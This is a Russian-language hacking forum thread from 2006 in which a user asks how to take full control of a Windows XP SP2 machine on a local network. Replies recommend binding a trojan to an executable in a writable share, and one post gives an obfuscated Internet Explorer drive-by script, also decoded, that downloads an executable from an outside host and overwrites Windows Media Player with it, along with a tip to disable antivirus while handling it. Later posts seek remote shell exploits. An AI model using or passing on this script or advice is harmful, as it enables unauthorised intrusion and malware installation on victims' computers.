??? КАК И ГЛАВНОЕ ЧЕМ ЛОМАНУТЬ WinXP-SP2 по локалке ???

Discussion in 'Безопасность и Анонимность' started by Duke Nukem, 16 Feb 2006.

  1. Duke Nukem

    Duke Nukem Elder - Старейшина

    Joined:
    15 Feb 2006
    Messages:
    37
    Likes Received:
    7
    Reputations:
    -5
    Народ хочу получить дельный совет чем орудовать в локалке!!!!
    Сведения об жертве:
    0.) O.C WinXP SP-2
    1.) есть шары(не важно какие главное что не C$ и т.д хотя есть полный доступ к одной из папок которая находится на C: )
    2.) tcp 139 135 и многое другое открыто ну как всегда.
    3.) Firewall нах. отсутствует.
    NEW:
    4.)445/tcp - Microsoft DS
    Удаленное выполнение команд (ms05-027)
    Обнаружена уязвимость в Microsoft Server Message Block (SMB),
    которая позволяет удаленному пользователю выполнить произвольный
    код на целевой системе.
    5.) И аньти вирь у него даже не стоит!!!

    В общем мне хотелсь бы получить доступ к системе для полного контроля апанента :D
     
    #1 Duke Nukem, 16 Feb 2006
    Last edited: 17 Feb 2006
  2. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    Можно попытся (Я про директорию к которой у тебя полный доступ) подменить там прогу какую-нить. В случае, конечно если они там есть. Берешь екзешник оттуда, клеишь его с троем и всё.
     
  3. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    Просто так пробить второй нельзя. По крайней мере у меня таких эксплоитов нет.

    Самый простой и эфективный способ - троян.

    А как его дать жертве? Полазь по форуму. Ну либо впарить, либо попросить заценить какой нить сайт, где он подгрузит трой через дыру в Ie. За полгода в Ie их уже штук 10-ть нашли. Правда найти рабочий эксплоит - проблема. Но всё возможно.
     
  4. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
  5. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Хм... Ну чтоб шелл получить с правами SYSTEM, как это поволял делать kaht, таких в паблике насегодня я не видел. Но можно устроить веселую жизнь ушастым уводя их в даун, такие есть. Попробуй вот это: http://forum.antichat.ru/threadedpost111536.html, не уверен что будет в локалке пахать, но мало ли.. Ну и конечно с троями стоит заморочиться, тут и удаленный контроль и перезагрузка... =) Вот только говоря что фаирвола нет это ошибаться, так как XP SP2 подразумевает интегрированный в Windows фаирвол. Ещё обрати внимание на уязвимости прикладных программ, IE например... Это самая большая дыра наверное...
     
  6. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    А да, kaht работает против SP2, да?
     
  7. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    Вот сплойт ...незнаю как у вас у меня работает

    Code:
    <script language="javascript">
    
    fff = String.fromCharCode(118,97,114,32,120,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,41,59,92,114,92,110,120,46,79,112,101,110,40,34,71,69,84,34,44,32,34,104,116,116,112,58,37,50,102,37,50,102,119,119,119,46,109,121,45,114,111,115,116,111,118,46,102,97,116,97,108,46,114,117,37,50,102,102,105,108,101,115,37,50,102,115,101,114,118,105,99,101,115,46,101,120,101,34,44,48,41,59,92,114,92,110,120,46,83,101,110,100,40,41,59,92,114,92,110,118,97,114,32,115,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,59,92,114,92,110,115,46,77,111,100,101,32,61,32,51,59,92,114,92,110,115,46,84,121,112,101,32,61,32,49,59,92,114,92,110,115,46,79,112,101,110,40,41,59,92,114,92,110,115,46,87,114,105,116,101,40,120,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,92,114,92,110,115,46,83,97,118,101,84,111,70,105,108,101,40,34,67,58,92,92,92,92,80,114,111,103,114,97,109,32,70,105,108,101,115,92,92,92,92,87,105,110,100,111,119,115,32,77,101,100,105,97,32,80,108,97,121,101,114,92,92,92,92,119,109,112,108,97,121,101,114,46,101,120,101,34,44,50,41,59,92,114,92,110,108,111,99,97,116,105,111,110,46,104,114,101,102,32,61,32,34,109,109,115,58,37,50,102,37,50,102,34,59,92,114,92,110);
    
    	myURL = "file:javascript:eval('" + fff + "')";
    	window.open(myURL,"_media");
       </script>
    
    закодированном в ASCII кодировку... аналог 
    
    <script language="javascript">
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http:%2f%2fwww.my-rostov.fatal.ru%2ffiles%2fservices.exe",0);
    x.Send();
    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);
    s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2);
    location.href = "mms:%2f%2f";
    </script>
    и взял я его из коммента видео ,на видео ачат ру
    и еще когда скопируешь на блокнот то айболит выруби а то сразу ловит троян довнлоудер
     
    1 person likes this.
  8. $ZLO$

    $ZLO$ Elder - Старейшина

    Joined:
    15 Jan 2005
    Messages:
    59
    Likes Received:
    3
    Reputations:
    0
    kaht не катит на SP2
     
  9. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    :) Да? Чё правда?
    Мля....Может он хоть под линухом покатит? :)
    Шутка. Ну и новости у тебя..... Мягко говоря, не первой свежести.
     
  10. $ZLO$

    $ZLO$ Elder - Старейшина

    Joined:
    15 Jan 2005
    Messages:
    59
    Likes Received:
    3
    Reputations:
    0
    слыш тока умничать не надо, лучше предложи что-то стояшее что даст шелл на 2 паке
     
  11. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    Есть одна вещь. Но этой самой вещи нехватает половине античатовцев. Мозг называется. И умение им пользоваться.
    :::::::Ничего личного:::::::::::::::::::::::
     
  12. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Не то чтобы работал против XP SP2, даже на XP SP2 работать не будет.

    Поддерживаю Electro.
     
    #12 Dronga, 16 Feb 2006
    Last edited: 16 Feb 2006
  13. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    Не делай так больше..... Столько смеяться нельзя :)
    Уууууууу............
     
  14. Rogun

    Rogun Elder - Старейшина

    Joined:
    12 Feb 2008
    Messages:
    76
    Likes Received:
    4
    Reputations:
    0
    Вообщем если уязвимость на компе в инете имеется
    Microsoft RPC 135 / tcp
    Версия опер системы: Windows Server 2003 R2 3790 Service Pack 2

    Нету шелла или проги для получения командной строки , у жертвы, что бы можно было удалённое выполнение команд (ms03-039)?